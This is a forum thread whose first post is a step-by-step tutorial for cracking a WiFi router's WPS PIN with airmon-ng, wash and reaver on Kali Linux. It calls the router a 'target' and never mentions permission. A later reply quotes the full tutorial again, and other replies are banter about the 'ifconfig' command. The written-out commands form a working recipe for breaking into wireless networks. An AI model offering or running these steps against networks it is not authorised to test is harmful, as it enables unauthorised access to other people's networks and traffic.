Post: How To Crack WIFI Hotspots Using Reaver
10-30-2015, 06:07 PM #1
Hydrogen
Super Mod
(adsbygoogle = window.adsbygoogle || []).push({}); *NOTE THE FOLLOWING*:
YOU WILL NEED LINUX, I USE KALI, WHICH ALREADY HAS EVERYTHING INSTALLED
YOU NEED AN ADAPTER THAT SUPPORTS INJECTION(I use the Alfa 036H)
WPS MUST BE ENABLE ON YOUR TARGET ROUTER OR THIS METHOD WILL NOT WORK!

------------------------------------------------------------------------------------------------------
1.
Open Command prompt and type in the following command:
CODE:
"ifconfig"
This will show us every single wireless adapter that is connected to the system. In this case it shows me that my adapters name is "wlan4"

------------------------------------------------------------------------------------------------------

2.
Type the following command:
CODE:
airmon-ng start wlan4
Replace wlan4 with the name of your adapter. This sets the card into monitor mode. Your adapter name should now be different, in my case it will be named "mon0"

------------------------------------------------------------------------------------------------------

3.
Type the following command:
CODE:
wash -i mon0
This displays every network that has WPS enabled. If you see a network on this list you can continue, if not you would want to stop right now and try a different method(I may post some later on.) Please copy the bssid as you will need it for step 4.

------------------------------------------------------------------------------------------------------

4.
Type the following command and replace the bssid with your own (as well as the adapter name, but it should be mon0 for most cases):
CODE:
reaver -b 00:C0:CA:6B:B7:06 -i mon0 -vv
After you click Enter it will start cracking. Depending on how far you are from the network will determine the cracking speed. Once its cracked you will see the WPA pin or what-not in clear text.
(adsbygoogle = window.adsbygoogle || []).push({});
10-31-2015, 10:48 AM #2
Toxic
former staff
"ifconfig" :seriously:
"ipconfig" tears
10-31-2015, 04:08 PM #3
Toxic
former staff
Originally posted by EYE
You know nothing Gaspkay:

ifconfig in short “interface configuration” utility for system/network administration in Unix/Linux operating systems to configure, manage and query network interface parameters via command line interface or in a system configuration scripts.

I didnt know it either Kidding me


noobs buddies tears ?

The following user thanked Toxic for this useful post:

SQUID-EYE
11-03-2015, 04:02 PM #4
Default Avatar
Kas
Guest
Originally posted by Lwja View Post
*NOTE THE FOLLOWING*:
YOU WILL NEED LINUX, I USE KALI, WHICH ALREADY HAS EVERYTHING INSTALLED
YOU NEED AN ADAPTER THAT SUPPORTS INJECTION(I use the Alfa 036H)
WPS MUST BE ENABLE ON YOUR TARGET ROUTER OR THIS METHOD WILL NOT WORK!

------------------------------------------------------------------------------------------------------
1.
Open Command prompt and type in the following command:
CODE:
"ifconfig"
This will show us every single wireless adapter that is connected to the system. In this case it shows me that my adapters name is "wlan4"

------------------------------------------------------------------------------------------------------

2.
Type the following command:
CODE:
airmon-ng start wlan4
Replace wlan4 with the name of your adapter. This sets the card into monitor mode. Your adapter name should now be different, in my case it will be named "mon0"

------------------------------------------------------------------------------------------------------

3.
Type the following command:
CODE:
wash -i mon0
This displays every network that has WPS enabled. If you see a network on this list you can continue, if not you would want to stop right now and try a different method(I may post some later on.) Please copy the bssid as you will need it for step 4.

------------------------------------------------------------------------------------------------------

4.
Type the following command and replace the bssid with your own (as well as the adapter name, but it should be mon0 for most cases):
CODE:
reaver -b 00:C0:CA:6B:B7:06 -i mon0 -vv
After you click Enter it will start cracking. Depending on how far you are from the network will determine the cracking speed. Once its cracked you will see the WPA pin or what-not in clear text.


Thread moved to Internet Talk as this is not Computer Programming.

Copyright © 2026, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo